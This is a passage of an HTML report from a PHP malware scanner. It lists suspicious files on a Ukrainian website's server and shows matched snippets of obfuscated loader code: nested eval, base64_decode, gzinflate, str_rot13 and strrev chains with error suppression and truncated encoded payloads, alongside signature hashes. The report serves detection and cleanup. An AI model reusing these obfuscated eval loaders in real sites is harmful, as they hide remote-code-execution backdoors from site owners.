<span style="color: #0000BB"></span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwRtF3uTXMQDYJ2O8umyGtGsMsdkHxFjTSqmY1beQbJ7x0Ls9WyJ6ASK9QrEzGTf7IdPIPre8mqhI9eodyFMNj9YGRJDn4CcfJ2kg2eIoDbWPphXTbRPGymWPdoz2ZTpl06XQOtLLx7gsxvK3Irk9BTH1PqIsFBobKuAAvoc0SoCKu93DeTNctdZDxvZmgGsswABEIsOaUOsA2MUKfu9SxAH8JNoIXBOCmP6yV9cgTI617pcLxXozLLp4CBgY6DKMgckypa8MEWDrpi0uDksDJcp9nY1MVP05l9w4HNHAr3s0crA8C0jhvHHHTYlLPxeNcFoVSCkMXiWORKVrbYrMaYRShWQq0pJFhNkC7vDJ1G0TBv51pj82gTS...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strrev</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">$_xwynUOL</span><span style="color: #007700">(</span><span style="color: #0000BB">_6Zys</span><span style="color: #007700">(</span><span style="color: #0000BB">$_cCzFdr</span><span style="color: #007700">))));}eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(</span><span style="color: #0000BB">_r5Me0FNrh83UY9xZt</span><span style="color: #007700">(</span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwR</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2P</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 exec_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RkRP</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 80e70adc <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 80e70adc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700"><?</span><span style="color: #0000BB">php<br /></span><span style="color: #007700">eval</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ldmFs</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">V2YW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_86").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ovatwtwmy.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.06 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 20:10:39</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 20:10:39</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_87" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSvuX0l+i/6Jm9xfGkJT3L4yTp5urFQ/jX0Q...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $LNuWx = '</span><span style="color: #0000BB">gzinflate</span><span style="color: #DD0000">'; $sJhXG = '</span><span style="color: #0000BB">str_rot13</span><span style="color: #DD0000">'; $Shgrt = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; echo '</span><span style="color: #007700"><</span><span style="color: #0000BB">br</span><span style="color: #007700">> </span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); eval($Shgrt($sJhXG($LNuWx($DesQW('</span><span style="color: #0000BB">rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf</span><span style="color: #007700">/</span><span style="color: #0000BB">h7yy8iIOHH</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$Shgrt</span><span style="color: #007700">(</span><span style="color: #0000BB">$sJhXG</span><span style="color: #007700">(</span><span style="color: #0000BB">$LNuWx</span><span style="color: #007700">(</span><span style="color: #0000BB">$DesQW</span><span style="color: #007700">(</span><span style="color: #DD0000">'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSv...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 eval_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RinY</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_87").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/kuben.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 70.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 18:56:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 18:56:47</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_88" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOExMemc3NS9...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5F</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">"; eval(</span><span style="color: #0000BB">$o</span><span style="color: #DD0000">("</span><span style="color: #0000BB">CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$o</span><span style="color: #007700">(</span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOEx...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">laVE</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev exec_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cExE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3BLb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"base64_decode"</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_88").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/zrreq.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 70.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:16:36</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:16:36</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_89" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOExMemc3NS9...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5F</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">"; eval(</span><span style="color: #0000BB">$o</span><span style="color: #DD0000">("</span><span style="color: #0000BB">CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$o</span><span style="color: #007700">(</span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOEx...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">laVE</span>
</span>
